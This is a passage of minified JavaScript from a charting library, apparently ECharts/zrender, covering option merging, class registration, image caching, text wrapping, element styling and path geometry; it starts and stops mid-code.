ga=["fontStyle","fontWeight","fontSize","fontFamily","rich","tag","color","textBorderColor","textBorderWidth","width","height","lineHeight","align","verticalAlign","baseline","shadowColor","shadowBlur","shadowOffsetX","shadowOffsetY","textShadowColor","textShadowBlur","textShadowOffsetX","textShadowOffsetY","backgroundColor","borderColor","borderWidth","borderRadius","padding"];function va(t){return!$(t)||Y(t)||t instanceof Date?t:t.value}function ya(t){return $(t)&&!(t instanceof Array)}function ma(t,e,n){var i="normalMerge"===n,r="replaceMerge"===n,o="replaceAll"===n;t=t||[],e=(e||[]).slice();var a=mt();E(e,function(t,n){$(t)||(e[n]=null)});var s,l,u=function(t,e,n){var i=[];if("replaceAll"===n)return i;for(var r=0;r<t.length;r++){var o=t[r];o&&null!=o.id&&e.set(o.id,r),i.push({existing:"replaceMerge"===n||Sa(o)?null:o,newOption:null,keyInfo:null,brandNew:null})}return i}(t,a,n);return(i||r)&&function(t,e,n,i){E(i,function(r,o){if(r&&null!=r.id){var a=xa(r.id),s=n.get(a);if(null!=s){var l=t[s];ct(!l.newOption,'Duplicated option on id "'+a+'".'),l.newOption=r,l.existing=e[s],i[o]=null}}})}(u,t,a,e),i&&function(t,e){E(e,function(n,i){if(n&&null!=n.name)for(var r=0;r<t.length;r++){var o=t[r].existing;if(!t[r].newOption&&o&&(null==o.id||null==n.id)&&!Sa(n)&&!Sa(o)&&_a("name",o,n))return t[r].newOption=n,void(e[i]=null)}})}(u,e),i||r?function(t,e,n){E(e,function(e){if(e){for(var i,r=0;(i=t[r])&&(i.newOption||Sa(i.existing)||i.existing&&null!=e.id&&!_a("id",e,i.existing));)r++;i?(i.newOption=e,i.brandNew=n):t.push({newOption:e,brandNew:n,existing:null,keyInfo:null}),r++}})}(u,e,r):o&&function(t,e){E(e,function(e){t.push({newOption:e,brandNew:!0,existing:null,keyInfo:null})})}(u,e),s=u,l=mt(),E(s,function(t){var e=t.existing;e&&l.set(e.id,t)}),E(s,function(t){var e=t.newOption;ct(!e||null==e.id||!l.get(e.id)||l.get(e.id)===t,"id duplicates: "+(e&&e.id)),e&&null!=e.id&&l.set(e.id,t),!t.keyInfo&&(t.keyInfo={})}),E(s,function(t,e){var n=t.existing,i=t.newOption,r=t.keyInfo;if($(i)){if(r.name=null!=i.name?xa(i.name):n?n.name:ha+e,n)r.id=xa(n.id);else if(null!=i.id)r.id=xa(i.id);else{var o=0;do{r.id="\0"+r.name+"\0"+o++}while(l.get(r.id))}l.set(r.id,t)}}),u}function _a(t,e,n){var i=ba(e[t],null),r=ba(n[t],null);return null!=i&&null!=r&&i===r}function xa(t){return ba(t,"")}function ba(t,e){return null==t?e:j(t)?t:K(t)||q(t)?t+"":e}function wa(t){var e=t.name;return!(!e||!e.indexOf(ha))}function Sa(t){return t&&null!=t.id&&0===xa(t.id).indexOf(pa)}function Ma(t,e){return null!=e.dataIndexInside?e.dataIndexInside:null!=e.dataIndex?Y(e.dataIndex)?V(e.dataIndex,function(e){return t.indexOfRawIndex(e)}):t.indexOfRawIndex(e.dataIndex):null!=e.name?Y(e.name)?V(e.name,function(e){return t.indexOfName(e)}):t.indexOfName(e.name):void 0}function Ta(){var t="__ec_inner_"+ka++;return function(e){return e[t]||(e[t]={})}}var ka=ta();function Ca(t,e,n){var i=Ia(e,n),r=i.mainTypeSpecified,o=i.queryOptionMap,a=i.others,s=n?n.defaultMainType:null;return!r&&s&&o.set(s,{}),o.each(function(e,i){var r=Pa(t,i,e,{useDefault:s===i,enableAll:!n||null==n.enableAll||n.enableAll,enableNone:!n||null==n.enableNone||n.enableNone});a[i+"Models"]=r.models,a[i+"Model"]=r.models[0]}),a}function Ia(t,e){var n;if(j(t)){var i={};i[t+"Index"]=0,n=i}else n=t;var r=mt(),o={},a=!1;return E(n,function(t,n){if("dataIndex"!==n&&"dataIndexInside"!==n){var i=n.match(/^(\w+)(Index|Id|Name)$/)||[],s=i[1],l=(i[2]||"").toLowerCase();if(s&&l&&!(e&&e.includeMainTypes&&R(e.includeMainTypes,s)<0))a=a||!!s,(r.get(s)||r.set(s,{}))[l]=t}else o[n]=t}),{mainTypeSpecified:a,queryOptionMap:r,others:o}}var Da={useDefault:!0,enableAll:!1,enableNone:!1},Aa={useDefault:!1,enableAll:!0,enableNone:!0};function Pa(t,e,n,i){i=i||Da;var r=n.index,o=n.id,a=n.name,s={models:null,specified:null!=r||null!=o||null!=a};if(!s.specified){var l=void 0;return s.models=i.useDefault&&(l=t.getComponent(e))?[l]:[],s}if("none"===r||!1===r){if(i.enableNone)return s.models=[],s;r=-1}return"all"===r&&(r=i.enableAll?o=a=null:-1),s.models=t.queryComponents({mainType:e,index:r,id:o,name:a}),s}function La(t,e,n){t.setAttribute?t.setAttribute(e,n):t[e]=n}function Oa(){return[1/0,-1/0]}function Ra(t,e){za(e)&&(e<t[0]&&(t[0]=e),e>t[1]&&(t[1]=e))}function Na(t,e){za(e)&&e<t[0]&&(t[0]=e)}function Ba(t,e){za(e)&&e>t[1]&&(t[1]=e)}function za(t){return null!=t&&isFinite(t)}function Ea(t,e){return za(t)&&za(e)&&t<=e}function Va(t){Ea(t[0],t[1])&&t[0]>t[1]&&(t[0]=t[1])}function Fa(){var t="__ec_once_"+Ha++;return function(e,n){wt(e,t)||(e[t]=1,n())}}var Ha=ta();function Ga(t,e,n){var i=mt(),r=0;E(t,function(o){var a=e(o);var s=i.get(a)||0;n&&n(o,s),s||n||(t[r++]=o),i.set(a,s+1)}),n||(t.length=r)}function Wa(t){return t.value+""}function Ua(t){return t+""}function Za(t,e){return at(e,!0)?t.seriesIndex+2:0}function Ya(t,e,n){var i=t.getData().count();return{progressiveRender:n.progressiveEnabled&&e.incrementalPrepareRender&&i>=n.threshold,large:t.get("large")&&i>=t.get("largeThreshold"),modDataCount:"mod"===t.get("progressiveChunkMode")?t.getData().count():null}}function Xa(t){return{overallReset:t}}var ja="___EC__COMPONENT__CONTAINER___",qa="___EC__EXTENDED_CLASS___";function Ka(t){var e={main:"",sub:""};if(t){var n=t.split(".");e.main=n[0]||"",e.sub=n[1]||""}return e}function $a(t,e){t.$constructor=t,t.extend=function(t){var e,i,r=this;return X(i=r)&&/^class\s/.test(Function.prototype.toString.call(i))?e=function(t){function e(){return t.apply(this,arguments)||this}return n(e,t),e}(r):(e=function(){(t.$constructor||r).apply(this,arguments)},N(e,this)),A(e.prototype,t),e[qa]=!0,e.extend=this.extend,e.superCall=ts,e.superApply=es,e.superClass=r,e}}function Qa(t,e){t.extend=e.extend}var Ja=Math.round(10*Math.random());function ts(t,e){for(var n=[],i=2;i<arguments.length;i++)n[i-2]=arguments[i];return this.superClass.prototype[e].apply(t,n)}function es(t,e,n){return this.superClass.prototype[e].apply(t,n)}function ns(t){var e={};t.registerClass=function(t){var n,i=t.type||t.prototype.type;if(i){ct(/^[a-zA-Z0-9_]+([.][a-zA-Z0-9_]+)?$/.test(n=i),'componentType "'+n+'" illegal'),t.prototype.type=i;var r=Ka(i);if(r.sub){if(r.sub!==ja){var o=function(t){var n=e[t.main];n&&n[ja]||((n=e[t.main]={})[ja]=!0);return n}(r);o[r.sub]=t}}else e[r.main]=t}return t},t.getClass=function(t,n,i){var r=e[t];if(r&&r[ja]&&(r=n?r[n]:null),i&&!r)throw new Error(n?"Component "+t+"."+(n||"")+" is used but not imported.":t+".type should be specified.");return r},t.getClassesByMainType=function(t){var n=Ka(t),i=[],r=e[n.main];return r&&r[ja]?E(r,function(t,e){e!==ja&&i.push(t)}):i.push(r),i},t.hasClass=function(t){var n=Ka(t);return!!e[n.main]},t.getAllClassMainTypes=function(){var t=[];return E(e,function(e,n){t.push(n)}),t},t.hasSubTypes=function(t){var n=Ka(t),i=e[n.main];return i&&i[ja]}}function is(t,e){for(var n=0;n<t.length;n++)t[n][1]||(t[n][1]=t[n][0]);return e=e||!1,function(n,i,r){for(var o={},a=0;a<t.length;a++){var s=t[a][1];if(!(i&&R(i,s)>=0||r&&R(r,s)<0)){var l=n.getShallow(s,e);null!=l&&(o[t[a][0]]=l)}}return o}}var rs=is([["fill","color"],["shadowBlur"],["shadowOffsetX"],["shadowOffsetY"],["opacity"],["shadowColor"]]),os=function(){function t(){}return t.prototype.getAreaStyle=function(t,e){return rs(this,t,e)},t}(),as=new Qn(50);function ss(t){if("string"==typeof t){var e=as.get(t);return e&&e.image}return t}function ls(t,e,n,i,r){if(t){if("string"==typeof t){if(e&&e.__zrImageSrc===t||!n)return e;var o=as.get(t),a={hostEl:n,cb:i,cbPayload:r};return o?!cs(e=o.image)&&o.pending.push(a):((e=c.loadImage(t,us,us)).__zrImageSrc=t,as.put(t,e.__cachedImgObj={image:e,pending:[a]})),e}return t}return e}function us(){var t=this.__cachedImgObj;this.onload=this.onerror=this.__cachedImgObj=null;for(var e=0;e<t.pending.length;e++){var n=t.pending[e],i=n.cb;i&&i(this,n.cbPayload),n.hostEl.dirty()}t.pending.length=0}function cs(t){return t&&t.width&&t.height}var hs=/\{([a-zA-Z0-9_]+)\|([^}]*)\}/g;function ps(t,e,n,i,r,o){if(!n)return t.text="",void(t.isTruncated=!1);var a=(e+"").split("\n");o=ds(n,i,r,o);for(var s=!1,l={},u=0,c=a.length;u<c;u++)fs(l,a[u],o),a[u]=l.textLine,s=s||l.isTruncated;t.text=a.join("\n"),t.isTruncated=s}function ds(t,e,n,i){var r=A({},i=i||{});n=at(n,"..."),r.maxIterations=at(i.maxIterations,2);var o=r.minChar=at(i.minChar,0),a=r.fontMeasureInfo=Vr(e),s=a.asciiCharWidth;r.placeholder=at(i.placeholder,"");for(var l=t=Math.max(0,t-1),u=0;u<o&&l>=s;u++)l-=s;var c=Wr(a,n);return c>l&&(n="",c=0),l=t-c,r.ellipsis=n,r.ellipsisWidth=c,r.contentWidth=l,r.containerWidth=t,r}function fs(t,e,n){var i=n.containerWidth,r=n.contentWidth,o=n.fontMeasureInfo;if(!i)return t.textLine="",void(t.isTruncated=!1);var a=Wr(o,e);if(a<=i)return t.textLine=e,void(t.isTruncated=!1);for(var s=0;;s++){if(a<=r||s>=n.maxIterations){e+=n.ellipsis;break}var l=0===s?gs(e,r,o):a>0?Math.floor(e.length*r/a):0;a=Wr(o,e=e.substr(0,l))}""===e&&(e=n.placeholder),t.textLine=e,t.isTruncated=!0}function gs(t,e,n){for(var i=0,r=0,o=t.length;r<o&&i<e;r++)i+=Gr(n,t.charCodeAt(r));return r}var vs=function(){},ys=function(t){this.tokens=[],t&&(this.tokens=t)},ms=function(){this.width=0,this.height=0,this.contentWidth=0,this.contentHeight=0,this.outerWidth=0,this.outerHeight=0,this.lines=[],this.isTruncated=!1};function _s(t,e,n,i,r){var o,a,s=""===e,l=r&&n.rich[r]||{},u=t.lines,c=l.font||n.font,h=!1;if(i){var p=l.padding,d=p?p[1]+p[3]:0;if(null!=l.width&&"auto"!==l.width){var f=qr(l.width,i.width)+d;u.length>0&&f+i.accumWidth>i.width&&(o=e.split("\n"),h=!0),i.accumWidth=f}else{var g=ws(e,c,i.width,i.breakAll,i.accumWidth);i.accumWidth=g.accumWidth+d,a=g.linesWidths,o=g.lines}}o||(o=e.split("\n"));for(var v=Vr(c),y=0;y<o.length;y++){var m=o[y],_=new vs;if(_.styleName=r,_.text=m,_.isLineHolder=!m&&!s,"number"==typeof l.width?_.width=l.width:_.width=a?a[y]:Wr(v,m),y||h)u.push(new ys([_]));else{var x=(u[u.length-1]||(u[0]=new ys)).tokens,b=x.length;1===b&&x[0].isLineHolder?x[0]=_:(m||!b||s)&&x.push(_)}}}var xs=F(",&?/;] ".split(""),function(t,e){return t[e]=!0,t},{});function bs(t){return!function(t){var e=t.charCodeAt(0);return e>=32&&e<=591||e>=880&&e<=4351||e>=4608&&e<=5119||e>=7680&&e<=8303}(t)||!!xs[t]}function ws(t,e,n,i,r){for(var o=[],a=[],s="",l="",u=0,c=0,h=Vr(e),p=0;p<t.length;p++){var d=t.charAt(p);if("\n"!==d){var f=Gr(h,d.charCodeAt(0)),g=!i&&!bs(d);(o.length?c+f>n:r+c+f>n)?c?(s||l)&&(g?(s||(s=l,l="",c=u=0),o.push(s),a.push(c-u),l+=d,s="",c=u+=f):(l&&(s+=l,l="",u=0),o.push(s),a.push(c),s=d,c=f)):g?(o.push(l),a.push(u),l=d,u=f):(o.push(d),a.push(f)):(c+=f,g?(l+=d,u+=f):(l&&(s+=l,l="",u=0),s+=d))}else l&&(s+=l,c+=u),o.push(s),a.push(c),s="",l="",u=0,c=0}return l&&(s+=l),s&&(o.push(s),a.push(c)),1===o.length&&(c+=r),{accumWidth:c,lines:o,linesWidths:a}}function Ss(t,e,n,i,r,o){if(t.baseX=n,t.baseY=i,t.outerWidth=t.outerHeight=null,e){var a=2*e.width,s=2*e.height;Ue.set(Ms,Yr(n,a,r),Xr(i,s,o),a,s),Ue.intersect(e,Ms,null,Ts);var l=Ts.outIntersectRect;t.outerWidth=l.width,t.outerHeight=l.height,t.baseX=Yr(l.x,l.width,r,!0),t.baseY=Xr(l.y,l.height,o,!0)}}var Ms=new Ue(0,0,0,0),Ts={outIntersectRect:{},clamp:!0};function ks(t){return null!=t?t+="":t=""}function Cs(t,e,n,i){var r=new Ue(Yr(t.x||0,e,t.textAlign),Xr(t.y||0,n,t.textBaseline),e,n),o=null!=i?i:Is(t)?t.lineWidth:0;return o>0&&(r.x-=o/2,r.y-=o/2,r.width+=o,r.height+=o),r}function Is(t){var e=t.stroke;return null!=e&&"none"!==e&&t.lineWidth>0}var Ds="__zr_style_"+Math.round(10*Math.random()),As={shadowBlur:0,shadowOffsetX:0,shadowOffsetY:0,shadowColor:"#000",opacity:1,blend:"source-over"},Ps={style:{shadowBlur:!0,shadowOffsetX:!0,shadowOffsetY:!0,shadowColor:!0,opacity:!0}};As[Ds]=!0;var Ls=["z","z2","invisible"],Os=["invisible"],Rs=function(t){function e(e){return t.call(this,e)||this}var i;return n(e,t),e.prototype._init=function(e){for(var n=W(e),i=0;i<n.length;i++){var r=n[i];"style"===r?this.useStyle(e[r]):t.prototype.attrKV.call(this,r,e[r])}this.style||this.useStyle({})},e.prototype.beforeBrush=function(t){},e.prototype.afterBrush=function(){},e.prototype.innerBeforeBrush=function(){},e.prototype.innerAfterBrush=function(){},e.prototype.shouldBePainted=function(t,e,n,i){var r=this.transform;if(this.ignore||this.invisible||0===this.style.opacity||this.culling&&function(t,e,n){Ns.copy(t.getBoundingRect()),t.transform&&Ns.applyTransform(t.transform);return Bs.width=e,Bs.height=n,!Ns.intersect(Bs)}(this,t,e)||r&&!r[0]&&!r[3])return!1;if(n&&this.__clipPaths&&this.__clipPaths.length)for(var o=0;o<this.__clipPaths.length;++o)if(this.__clipPaths[o].isZeroArea())return!1;if(i&&this.parent)for(var a=this.parent;a;){if(a.ignore)return!1;a=a.parent}return!0},e.prototype.contain=function(t,e){return this.rectContain(t,e)},e.prototype.traverse=function(t,e){t.call(e,this)},e.prototype.rectContain=function(t,e){var n=this.transformCoordToLocal(t,e);return this.getBoundingRect().contain(n[0],n[1])},e.prototype.getPaintRect=function(){var t=this._paintRect;if(!this._paintRect||this.__dirty){var e=this.transform,n=this.getBoundingRect(),i=this.style,r=i.shadowBlur||0,o=i.shadowOffsetX||0,a=i.shadowOffsetY||0;t=this._paintRect||(this._paintRect=new Ue(0,0,0,0)),e?Ue.applyTransform(t,n,e):t.copy(n),(r||o||a)&&(t.width+=2*r+Math.abs(o),t.height+=2*r+Math.abs(a),t.x=Math.min(t.x,t.x+o-r),t.y=Math.min(t.y,t.y+a-r));var s=this.dirtyRectTolerance;t.isZero()||(t.x=Math.floor(t.x-s),t.y=Math.floor(t.y-s),t.width=Math.ceil(t.width+1+2*s),t.height=Math.ceil(t.height+1+2*s))}return t},e.prototype.setPrevPaintRect=function(t){t?(this._prevPaintRect=this._prevPaintRect||new Ue(0,0,0,0),this._prevPaintRect.copy(t)):this._prevPaintRect=null},e.prototype.getPrevPaintRect=function(){return this._prevPaintRect},e.prototype.animateStyle=function(t){return this.animate("style",t)},e.prototype.updateDuringAnimation=function(t){"style"===t?this.dirtyStyle():this.markRedraw()},e.prototype.attrKV=function(e,n){"style"!==e?t.prototype.attrKV.call(this,e,n):this.style?this.setStyle(n):this.useStyle(n)},e.prototype.setStyle=function(t,e){return"string"==typeof t?this.style[t]=e:A(this.style,t),this.dirtyStyle(),this},e.prototype.dirtyStyle=function(t){t||this.markRedraw(),this.__dirty|=2,this._rect&&(this._rect=null)},e.prototype.dirty=function(){this.dirtyStyle()},e.prototype.styleChanged=function(){return!!(2&this.__dirty)},e.prototype.styleUpdated=function(){this.__dirty&=-3},e.prototype.createStyle=function(t){return xt(As,t)},e.prototype.useStyle=function(t){t[Ds]||(t=this.createStyle(t)),this.style=t,this.dirtyStyle()},e.prototype._useHoverStyle=function(t){this.__hoverStyle=t},e.prototype.isStyleObject=function(t){return t[Ds]},e.prototype._innerSaveToNormal=function(e){t.prototype._innerSaveToNormal.call(this,e);var n=this._normalState;e.style&&!n.style&&(n.style=this._mergeStyle(this.createStyle(),this.style)),this._savePrimaryToNormal(e,n,Ls)},e.prototype._applyStateObj=function(e,n,i,r,o,a){t.prototype._applyStateObj.call(this,e,n,i,r,o,a);var s,l=!(n&&r),u=1===this.__inHover;if(n&&n.style?o?r?s=n.style:(s=this._mergeStyle(this.createStyle(),i.style),this._mergeStyle(s,n.style)):(s=this._mergeStyle(this.createStyle(),r?this.style:i.style),this._mergeStyle(s,n.style)):l&&(s=i.style),s)if(o){var c=this.style;if(this.style=this.createStyle(l?{}:c),l)for(var h=W(c),p=0;p<h.length;p++){(f=h[p])in s&&(s[f]=s[f],this.style[f]=c[f])}var d=W(s);for(p=0;p<d.length;p++){var f=d[p];this.style[f]=this.style[f]}this._transitionState(e,{style:s},a,this.getAnimationStyleProps())}else u?this._useHoverStyle(s):this.useStyle(s);if(!u){var g=this.__inHover?Os:Ls;for(p=0;p<g.length;p++){f=g[p];n&&null!=n[f]?this[f]=n[f]:l&&null!=i[f]&&(this[f]=i[f])}}},e.prototype._mergeStates=function(e){for(var n,i=t.prototype._mergeStates.call(this,e),r=0;r<e.length;r++){var o=e[r];o.style&&(n=n||{},this._mergeStyle(n,o.style))}return n&&(i.style=n),i},e.prototype._mergeStyle=function(t,e){return A(t,e),t},e.prototype.getAnimationStyleProps=function(){return Ps},e.initDefaultProps=((i=e.prototype).type="displayable",i.invisible=!1,i.z=0,i.z2=0,i.zlevel=0,i.culling=!1,i.cursor="pointer",i.rectHover=!1,i.incremental=0,i._rect=null,i.dirtyRectTolerance=0,void(i.__dirty=3)),e}(io),Ns=new Ue(0,0,0,0),Bs=new Ue(0,0,0,0);var zs=Math.min,Es=Math.max,Vs=Math.sin,Fs=Math.cos,Hs=2*Math.PI,Gs=Ct(),Ws=Ct(),Us=Ct();function Zs(t,e,n,i,r,o){r[0]=zs(t,n),r[1]=zs(e,i),o[0]=Es(t,n),o[1]=Es(e,i)}var Ys=[],Xs=[];function js(t,e,n,i,r,o,a,s,l,u){var c=Vn,h=Bn,p=c(t,n,r,a,Ys);l[0]=1/0,l[1]=1/0,u[0]=-1/0,u[1]=-1/0;for(var d=0;d<p;d++){var f=h(t,n,r,a,Ys[d]);l[0]=zs(f,l[0]),u[0]=Es(f,u[0])}p=c(e,i,o,s,Xs);for(d=0;d<p;d++){var g=h(e,i,o,s,Xs[d]);l[1]=zs(g,l[1]),u[1]=Es(g,u[1])}l[0]=zs(t,l[0]),u[0]=Es(t,u[0]),l[0]=zs(a,l[0]),u[0]=Es(a,u[0]),l[1]=zs(e,l[1]),u[1]=Es(e,u[1]),l[1]=zs(s,l[1]),u[1]=Es(s,u[1])}function qs(t,e,n,i,r,o,a,s){var l=Un,u=Gn,c=Es(zs(l(t,n,r),1),0),h=Es(zs(l(e,i,o),1),0),p=u(t,n,r,c),d=u(e,i,o,h);a[0]=zs(t,r,p),a[1]=zs(e,o,d),s[0]=Es(t,r,p),s[1]=Es(e,o,d)}function Ks(t,e,n,i,r,o,a,s,l){var u=Zt,c=Yt,h=Math.abs(r-o);if(h%Hs<1e-4&&h>1e-4)return s[0]=t-n,s[1]=e-i,l[0]=t+n,void(l[1]=e+i);if(Gs[0]=Fs(r)*n+t,Gs[1]=Vs(r)*i+e,Ws[0]=Fs(o)*n+t,Ws[1]=Vs(o)*i+e,u(s,Gs,Ws),c(l,Gs,Ws),(r%=Hs)<0&&(r+=Hs),(o%=Hs)<0&&(o+=Hs),r>o&&!a?o+=Hs:r<o&&a&&(r+=Hs),a){var p=o;o=r,r=p}for(var d=0;d<o;d+=Math.PI/2)d>r&&(Us[0]=Fs(d)*n+t,Us[1]=Vs(d)*i+e,u(s,Us,s),c(l,Us,l))}var $s={M:1,L:2,C:3,Q:4,A:5,Z:6,R:7},Qs=[],Js=[],tl=[],el=[],nl=[],il=[],rl=Math.min,ol=Math.max,al=Math.cos,sl=Math.sin,ll=Math.abs,ul=Math.PI,cl=2*ul,hl="undefined"!=typeof Float32Array,pl=[];function dl(t){return Math.round(t/ul*1e8)/1e8%2*ul}function fl(t,e){var n=dl(t[0]);n<0&&(n+=cl);var i=n-t[0],r=t[1];r+=i,!e&&r-n>=cl?r=n+cl:e&&n-r>=cl?r=n-cl:!e&&n>r?r=n+(cl-dl(n-r)):e&&n<r&&(r=n-(cl-dl(r-n))),t[0]=n,t[1]=r}var gl=function(){function t(t){this.dpr=1,this._xi=0,this._yi=0,this._x0=0,this._y0=0,this._len=0,t&&(this._saveData=!1),this._saveData&&(this.data=[])}var e;return t.prototype.increaseVersion=function(){this._version++},t.prototype.getVersion=function(){return this._version},t.prototype.setScale=function(t,e,n){(n=n||0)>0&&(this._ux=ll(n/Sr/t)||0,this._uy=ll(n/Sr/e)||0)},t.prototype.setDPR=function(t){this.dpr=t},t.prototype.setContext=function(t){this._ctx=t},t.prototype.getContext=function(){return this._ctx},t.prototype.beginPath=function(){return this._ctx&&this._ctx.beginPath(),this.reset(),this},t.prototype.reset=function(){this._saveData&&(this._len=0),this._pathSegLen&&(this._pathSegLen=null,this._pathLen=0),this._version++},t.prototype.moveTo=function(t,e){return this._drawPendingPt(),this.addData($s.M,t,e),this._ctx&&this._ctx.moveTo(t,e),this._x0=t,this._y0=e,this._xi=t,this._yi=e,this},t.prototype.lineTo=function(t,e){var n=ll(t-this._xi),i=ll(e-this._yi),r=n>this._ux||i>this._uy;if(this.addData($s.L,t,e),this._ctx&&r&&this._ctx.lineTo(t,e),r)this._xi=t,this._yi=e,this._pendingPtDist=0;else{var o=n*n+i*i;o>this._pendingPtDist&&(this._pendingPtX=t,this._pendingPtY=e,this._pendingPtDist=o)}return this},t.prototype.bezierCurveTo=function(t,e,n,i,r,o){return this._drawPendingPt(),this.addData($s.C,t,e,n,i,r,o),this._ctx&&this._ctx.bezierCurveTo(t,e,n,i,r,o),this._xi=r,this._yi=o,this},t.prototype.quadraticCurveTo=function(t,e,n,i){return this._drawPendingPt(),this.addData($s.Q,t,e,n,i),this._ctx&&this._ctx.quadraticCurveTo(t,e,n,i),this._xi=n,this._yi=i,this},t.prototype.arc=function(t,e,n,i,r,o){this._drawPendingPt(),pl[0]=i,pl[1]=r,fl(pl,o),i=pl[0];var a=(r=pl[1])-i;return this.addData($s.A,t,e,n,n,i,a,0,o?0:1),this._ctx&&this._ctx.arc(t,e,n,i,r,o),this._xi=al(r)*n+t,this._yi=sl(r)*n+e,this},t.prototype.arcTo=function(t,e,n,i,r){return this._drawPendingPt(),this._ctx&&this._ctx.arcTo(t,e,n,i,r),this},t.prototype.rect=function(t,e,n,i){return this._drawPendingPt(),this._ctx&&this._ctx.rect(t,e,n,i),this.addData($s.R,t,e,n,i),this},t.prototype.closePath=function(){this._drawPendingPt(),this.addData($s.Z);var t=this._ctx,e=this._x0,n=this._y0;return t&&t.closePath(),this._xi=e,this._yi=n,this},t.prototype.fill=function(t){t&&t.fill(),this.toStatic()},t.prototype.stroke=function(t){t&&t.stroke(),this.toStatic()},t.prototype.len=function(){return this._len},t.prototype.setData=function(t){if(this._saveData){var e=t.length;this.data&&this.data.length===e||!hl||(this.data=new Float32Array(e));for(var n=0;n<e;n++)this.data[n]=t[n];this._len=e}},t.prototype.appendPath=function(t){if(this._saveData){t instanceof Array||(t=[t]);for(var e=t.length,n=0,i=this._len,r=0;r<e;r++)n+=t[r].len();var o=this.data;if(hl&&(o instanceof Float32Array||!o)&&(this.data=new Float32Array(i+n),i>0&&o))for(var a=0;a<i;a++)this.data[a]=o[a];for(r=0;r<e;r++){var s=t[r].data;for(a=0;a<s.length;a++)this.data[i++]=s[a]}this._len=i}},t.prototype.addData=function(t,e,n,i,r,o,a,s,l){if(this._saveData){var u=this.data;this._len+arguments.length>u.length&&(this._expandData(),u=this.data);for(var c=0;c<arguments.length;c++)u[this._len++]=arguments[c]}},t.prototype._drawPendingPt=function(){this._pendingPtDist>0&&(this._ctx&&this._ctx.lineTo(this._pendingPtX,this._pendingPtY),this._pendingPtDist=0)},t.prototype._expandData=function(){if(!(this.data instanceof Array)){for(var t=[],e=0;e<this._len;e++)t[e]=this.data[e];this.data=t}},t.prototype.toStatic=function(){if(this._saveData){this._drawPendingPt();var t=this.data;t instanceof Array&&(t.length=this._len,hl&&this._len>11&&(this.data=new Float32Array(t)))}},t.prototype.getBoundingRect=function(){tl[0]=tl[1]=nl[0]=nl[1]=Number.MAX_VALUE,el[0]=el[1]=il[0]=il[1]=-Number.MAX_VALUE;var t,e=this.data,n=0,i=0,r=0,o=0;for(t=0;t<this._len;){var a=e[t++],s=1===t;switch(s&&(r=n=e[t],o=i=e[t+1]),a){case $s.M:n=r=e[t++],i=o=e[t++],nl[0]=r,nl[1]=o,il[0]=r,il[1]=o;break;case $s.L:Zs(n,i,e[t],e[t+1],nl,il),n=e[t++],i=e[t++];break;case $s.C:js(n,i,e[t++],e[t++],e[t++],e[t++],e[t],e[t+1],nl,il),n=e[t++],i=e[t++];break;case $s.Q:qs(n,i,e[t++],e[t++],e[t],e[t+1],nl,il),n=e[t++],i=e[t++];break;case $s.A:var l=e[t++],u=e[t++],c=e[t++],h=e[t++],p=e[t++],d=e[t++]+p;t+=1;var f=!e[t++];s&&(r=al(p)*c+l,o=sl(p)*h+u),Ks(l,u,c,h,p,d,f,nl,il),n=al(d)*c+l,i=sl(d)*h+u;break;case $s.R:Zs(r=n=e[t++],o=i=e[t++],r+e[t++],o+e[t++],nl,il);break;case $s.Z:n=r,i=o}Zt(tl,tl,nl),Yt(el,el,il)}return 0===t&&(tl[0]=tl[1]=el[0]=el[1]=0),new Ue(tl[0],tl[1],el[0]-tl[0],el[1]-tl[1])},t.prototype._calculateLength=function(){var t=this.data,e=this._len,n=this._ux,i=this._uy,r=0,o=0,a=0,s=0;this._pathSegLen||(this._pathSegLen=[]);for(var l=this._pathSegLen,u=0,c=0,h=0;h<e;){var p=t[h++],d=1===h;d&&(a=r=t[h],s=o=t[h+1]);var f=-1;switch(p){case $s.M:r=a=t[h++],o=s=t[h++];break;case $s.L:var g=t[h++],v=(_=t[h++])-o;(ll(D=g-r)>n||ll(v)>i||h===e-1)&&(f=Math.sqrt(D*D+v*v),r=g,o=_);break;case $s.C:var y=t[h++],m=t[h++],_=(g=t[h++],t[h++]),x=t[h++],b=t[h++];f=Hn(r,o,y,m,g,_,x,b,10),r=x,o=b;break;case $s.Q:f=Yn(r,o,y=t[h++],m=t[h++],g=t[h++],_=t[h++],10),r=g,o=_;break;case $s.A:var w=t[h++],S=t[h++],M=t[h++],T=t[h++],k=t[h++],C=t[h++],I=C+k;h+=1,d&&(a=al(k)*M+w,s=sl(k)*T+S),f=ol(M,T)*rl(cl,Math.abs(C)),r=al(I)*M+w,o=sl(I)*T+S;break;case $s.R:a=r=t[h++],s=o=t[h++],f=2*t[h++]+2*t[h++];break;case $s.Z:var D=a-r;v=s-o;f=Math.sqrt(D*D+v*v),r=a,o=s}f>=0&&(l[c++]=f,u+=f)}return this._pathLen=u,u},t.prototype.rebuildPath=function(t,e){var n,i,r,o,a,s,l,u,c,h,p=this.data,d=this._ux,f=this._uy,g=this._len,v=e<1,y=0,m=0,_=0;if(!v||(this._pathSegLen||this._calculateLength(),l=this._pathSegLen,u=e*this._pathLen))t:for(var x=0;x<g;){var b=p[x++],w=1===x;switch(w&&(n=r=p[x],i=o=p[x+1]),b!==$s.L&&_>0&&(t.lineTo(c,h),_=0),b){case $s.M:n=r=p[x++],i=o=p[x++],t.moveTo(r,o);break;case $s.L:a=p[x++],s=p[x++];var S=ll(a-r),M=ll(s-o);if(S>d||M>f){if(v){if(y+(j=l[m++])>u){var T=(u-y)/j;t.lineTo(r*(1-T)+a*T,o*(1-T)+s*T);break t}y+=j}t.lineTo(a,s),r=a,o=s,_=0}else{var k=S*S+M*M;k>_&&(c=a,h=s,_=k)}break;case $s.C:var C=p[x++],I=p[x++],D=p[x++],A=p[x++],P=p[x++],L=p[x++];if(v){if(y+(j=l[m++])>u){Fn(r,C,D,P,T=(u-y)/j,Qs),Fn(o,I,A,L,T,Js),t.bezierCurveTo(Qs[1],Js[1],Qs[2],Js[2],Qs[3],Js[3]);break t}y+=j}t.bezierCurveTo(C,I,D,A,P,L),r=P,o=L;break;case $s.Q:C=p[x++],I=p[x++],D=p[x++],A=p[x++];if(v){if(y+(j=l[m++])>u){Zn(r,C,D,T=(u-y)/j,Qs),Zn(o,I,A,T,Js),t.quadraticCurveTo(Qs[1],Js[1],Qs[2],Js[2]);break t}y+=j}t.quadraticCurveTo(C,I,D,A),r=D,o=A;break;case $s.A:var 